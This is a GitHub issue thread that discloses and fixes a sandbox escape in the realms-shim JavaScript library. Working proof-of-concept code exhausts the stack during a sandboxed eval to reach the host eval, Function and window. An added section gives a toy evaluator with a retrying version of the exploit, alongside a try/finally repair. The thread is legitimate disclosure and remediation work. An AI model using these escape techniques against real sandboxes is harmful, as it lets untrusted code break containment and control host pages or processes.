Breakout via RangeError: Maximum call stack size exceeded #48

Closed
XmiliaH opened this issue Sep 14, 2019 · 3 comments · Fixed by #49

Comments

@XmiliaH commented Sep 14, 2019

You can break out of the example via:

// Recurse until the stack is exhausted while the sandbox's eval is mid-call;
// the RangeError thrown inside that call is caught and returned rather than
// propagating out of the recursion.
function loop(g){
  try{
    g["eval"]('1');
  }catch(e){
    return e;
  }
  return loop(g);
}
loop(this);
// The scope handler is now stuck in "system mode", so this lookup of `eval`
// resolves to the host's real eval instead of the sandboxed one.
const e = eval;
const f = e('Function');                            // host Function constructor
f('return window')().top.document.title = "Oh No";  // host window: escape complete

Tested on Chrome Version 76.0.3809.132 (Official Build) (64-Bit)

@Jack-Works (Contributor)

Curious why it happened

@jfparadis (Contributor) commented Sep 14, 2019

Simplified repro:

// Exhaust the stack while the sandboxed eval is executing and swallow the RangeError.
function loop(g){
  try{
    g["eval"]('1');
  }catch(e){
    return e;
  }
  return loop(g);
}
loop(this);
// Indirect eval after the overflow: the handler was left in system mode, so this
// runs against the host realm instead of the sandbox.
(0, eval)('window') + '';

Output should be "undefined" but is actually "[object Window]".

@jfparadis (Contributor)
The cause: the scoped proxy handler is shared between multiple evaluators. When the range error occurs, the state is left in system mode and the unsafe eval is available in user land.

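The shared-handler failure described in the comment above, as an added example that is my own toy model and not realms-shim's code: one scope handler per realm with a one-shot `useUnsafeEvaluator` flag, sandboxed exploit code that drives the stack overflow into the window between setting the flag and the `eval` lookup, and the same evaluator with the flag cleared in a `finally`. The names `makeRealm`, `runExploit`, `escapes` and the `resetInFinally` switch are mine; the `finally` shape is the kind of fix that closes this hole, not necessarily the exact change in #49. Because where a stack overflow lands is not deterministic, the exploit retries from a slightly deeper base stack each time instead of assuming one attempt suffices, as the original repro does; under Node there is no `window`, so the breakout returns the host `globalThis`.

```javascript
'use strict';

// Toy model of the realms-shim scoped evaluator (mine, not the project's code),
// just enough to reproduce the state corruption described in this issue.
function makeRealm({ resetInFinally }) {
  const unsafeEval = eval;        // the host realm's real eval: must never reach sandbox code
  const safeGlobal = {};          // the sandbox's global object
  safeGlobal.globalThis = safeGlobal;

  // One handler shared by every evaluation in this realm. "System mode" is the
  // window in which a lookup of `eval` is allowed to return the real eval.
  const scopeHandler = {
    useUnsafeEvaluator: false,
    has() { return true; },       // shadow every name so lookups never reach the host global
    get(target, prop) {
      if (prop === Symbol.unscopables) return undefined;
      if (prop === 'eval' && this.useUnsafeEvaluator) {
        this.useUnsafeEvaluator = false;   // one-shot: hand out the real eval exactly once
        return unsafeEval;
      }
      return target[prop];                 // everything else comes from the sandbox global
    },
  };
  const scopeProxy = new Proxy(safeGlobal, scopeHandler);

  // Sloppy-mode factory so `with` is legal. The inner function resolves `eval`
  // through scopeProxy, which makes the call a direct eval inside the `with` scope.
  const scopedEvaluator = new Function(`
    with (arguments[0]) {
      return function () { 'use strict'; return eval(arguments[0]); };
    }
  `)(scopeProxy);

  function safeEval(src) {
    scopeHandler.useUnsafeEvaluator = true;   // enter system mode for the lookup that follows
    if (!resetInFinally) {
      // Vulnerable shape: only the get trap clears the flag. Anything thrown between
      // here and that trap (a RangeError on stack exhaustion) leaves system mode on.
      return scopedEvaluator.call(safeGlobal, `${src}`);
    }
    try {
      return scopedEvaluator.call(safeGlobal, `${src}`);
    } finally {
      scopeHandler.useUnsafeEvaluator = false;  // fixed shape: leave system mode however we exit
    }
  }
  safeGlobal.eval = safeEval;
  return { evaluate: safeEval, global: safeGlobal };
}

// Exploit source run inside the sandbox (constructed for this example). Same idea as the
// repro above, plus a retry loop: `pad` shifts the base stack depth by i frames so that the
// overflow eventually lands inside the evaluator's window rather than on entry to `probe`.
const EXPLOIT = `
  (function (g) {
    function pad(n, f) { return n === 0 ? f() : pad(n - 1, f); }
    function probe() {
      try { g.eval('1'); } catch (err) { return err; }  // recurse until the evaluator itself overflows
      return probe();
    }
    for (let i = 0; i < 64; i++) {
      try { pad(i, probe); } catch (err) { continue; }   // overflowed outside the evaluator: shift and retry
      const leaked = eval;                               // resolved through the scope proxy
      if (leaked !== g.eval) {                           // handler was left in system mode
        return leaked('Function')('return globalThis')(); // host Function, host global
      }
    }
    return 'contained';
  })(this)
`;

function runExploit(realm) {
  return realm.evaluate(EXPLOIT);
}

// True when sandboxed code obtained the host global object.
function escapes(resetInFinally) {
  return runExploit(makeRealm({ resetInFinally })) === globalThis;
}

console.log('vulnerable evaluator escapes:', escapes(false));     // true
console.log('finally-reset evaluator escapes:', escapes(true));   // false
```

Normal evaluation stays contained in both variants (`realm.evaluate('globalThis')` is the sandbox global); only the overflow-in-the-window case differs. Clearing the flag in `finally` is the minimal repair of this shape; a stricter evaluator would also refuse to continue if it ever finds the flag still set after the call, since that means the `eval` lookup never happened.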
jfparadis added a commit that referenced this issue Sep 14, 2019
warner added a commit to Agoric/SES that referenced this issue Sep 15, 2019
this fixes the sandbox escape described in
Agoric/realms-shim#48
warner added a commit to Agoric/SES that referenced this issue Sep 15, 2019
this fixes the sandbox escape described in
Agoric/realms-shim#48
warner added a commit to Agoric/SwingSet that referenced this issue Sep 18, 2019
This fixes a sandbox escape in the realms-shim, described in
Agoric/realms-shim#48
jfparadis pushed a commit to endojs/endo that referenced this issue Nov 11, 2019
this fixes the sandbox escape described in
Agoric/realms-shim#48